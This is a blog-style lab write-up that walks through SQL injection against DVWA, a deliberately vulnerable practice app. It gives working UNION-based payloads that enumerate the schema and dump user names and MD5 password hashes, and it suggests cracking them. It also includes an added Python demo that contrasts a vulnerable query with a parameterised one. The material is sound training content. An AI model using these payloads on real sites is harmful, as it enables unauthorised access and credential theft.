DVWA SQL Injection Write-up

Viral Parmar
Jan 18, 2020 (5 min read)


Hello there! In this write-up I walk through one of the most famous vulnerabilities on the internet, and yes, that is SQL Injection.

What is DVWA

What is Damn Vulnerable Web App (DVWA)? Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications, and aid teachers/students to teach/learn web application security in a classroom environment.

SQL Injection

So basically SQL Injection is a trick to inject a SQL query/command as input, usually via a web page. Many web pages take parameters from the web user and build a SQL query to the database from them. Take for instance a user login: the web page takes the user name and password and makes a SQL query to the database to check whether that user has a valid name and password. With SQL Injection, it is possible for us to send a crafted user name and/or password field that changes the SQL query and thus grants us something else.

Injection Detail:

Vulnerability: SQL Injection

Difficulty Level : Easy

First we will see what SQL injection actually is.

Let's power up DVWA, set the difficulty level, and begin with the following.

Select SQL Injection from the left pane and we begin.

Input “1” into the text box. Click Submit.

Note: the web page/code is supposed to print the ID, first name, and surname to the screen. Below is the PHP select statement that we will be exploiting, specifically the $id variable, which is pasted straight into the query string without any validation or parameter binding.

$getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'";

It looks cheesy. Hmm, we should explore it more.

Always True Scenario

Input the below text into the User ID Textbox (See Picture).

%' or '0'='0    Click Submit

In this scenario, we are saying display all records that are false and all records that are true. %' will probably not be equal to anything, and will be false. '0'='0' is equal to true, because 0 will always equal 0. The resulting database statement is: mysql> SELECT first_name, last_name FROM users WHERE user_id = '%' or '0'='0';
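As an added illustration (not part of the original write-up), the same lookup modelled in Python with SQLite: the vulnerable function pastes the input into the query string exactly as the PHP line above does, while the parameterised function hands the value to the driver separately, so the always-true payload returns every row from the first and nothing from the second. The users table and its rows are constructed sample data, not DVWA's real users.

```python
import sqlite3

# Constructed sample rows mirroring DVWA's users table layout
# (user_id, first_name, last_name, user, password). Names and the
# "password" placeholders are made up for this example.
SAMPLE_USERS = [
    (1, "Alice", "Admin", "alice", "<hash placeholder 1>"),
    (2, "Bob", "Builder", "bob", "<hash placeholder 2>"),
    (3, "Carol", "Coder", "carol", "<hash placeholder 3>"),
    (4, "Dave", "Dev", "dave", "<hash placeholder 4>"),
    (5, "Eve", "Eng", "eve", "<hash placeholder 5>"),
]

# The payload from the write-up: closes the quoted literal and appends a
# condition that is always true.
ALWAYS_TRUE = "%' or '0'='0"


def make_db():
    """Build an in-memory SQLite database with the constructed users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (user_id INTEGER, first_name TEXT, "
        "last_name TEXT, user TEXT, password TEXT)"
    )
    conn.executemany("INSERT INTO users VALUES (?, ?, ?, ?, ?)", SAMPLE_USERS)
    return conn


def lookup_vulnerable(conn, user_id):
    """Mirror of DVWA's low-level PHP: the input is interpolated into the SQL."""
    getid = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    return conn.execute(getid).fetchall()


def lookup_safe(conn, user_id):
    """Parameterised query: the value travels separately from the SQL text, so
    quotes inside it can never terminate the literal or add new clauses."""
    sql = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return conn.execute(sql, (user_id,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, id=1      :", lookup_vulnerable(db, "1"))
    print("vulnerable, always-true:", lookup_vulnerable(db, ALWAYS_TRUE))
    print("safe, id=1            :", lookup_safe(db, "1"))
    print("safe, always-true      :", lookup_safe(db, ALWAYS_TRUE))
```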

Hmm, found some users. Interesting, let's dig a little deeper.

Display Database Version

Input the below text into the User ID Textbox (See Picture).

%' or 0=0 union select null, version() #    Click Submit

Notice in the last displayed line, 5.1.60 is displayed in the surname. This is the version of the MySQL database.

Yeaaa, we got the version.

Display Database User

Input the below text into the User ID Textbox (See Picture).

%' or 0=0 union select null, user() #

Notice in the last displayed line, root@localhost is displayed in the surname. This is the name of the database user that the PHP code behind the scenes connects as.

Last Line is ❤

Display Database Name

Input the below text into the User ID Textbox (See Picture).

%' or 0=0 union select null, database() #

Notice in the last displayed line, DVWA is displayed in the surname.

This is the name of the database.

Display all table information in information_schema

Input the below text into the User ID Textbox (See Picture).

%' and 1=0 union select null, table_name from information_schema.tables #    Click Submit

Now we are displaying all the tables in the information_schema database.

The INFORMATION_SCHEMA is the information database, the place that stores information about all the other databases that the MySQL server maintains.

Wow, there is lots of information here.

Display all the user tables in information_schema

Input the below text into the User ID Textbox (See Picture).

%' and 1=0 union select null, table_name from information_schema.tables where table_name like 'user%' #    Click Submit

Now we are displaying all the tables that start with the prefix “user” in the information_schema database.

And the user tables are extracted.

Display all the column fields of the users table via information_schema

Input the below text into the User ID Textbox (See Picture).

%' and 1=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name = 'users' #    Click Submit

Now we are displaying all the columns in the users table.

Notice there are user_id, first_name, last_name, user and password columns.

All the columns are here.

Display the contents of all the column fields in the users table

Input the below text into the User ID Textbox (See Picture).

%' and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users #    Click Submit

Now we have successfully displayed all the authentication information held in this database.

It's called a hash again :)

And that's it. We have the password hashes, they are MD5, and you know it's quite easy: just decode them and enjoy the ultimate user :)

This hack is performed with DVWA, which is a practice application. I won't harm any system for this hack, and I'm not responsible for any kind of hack done by you; it's for educational purposes only. B)

I hope you will understand the write-up and enjoy it.

Peace…
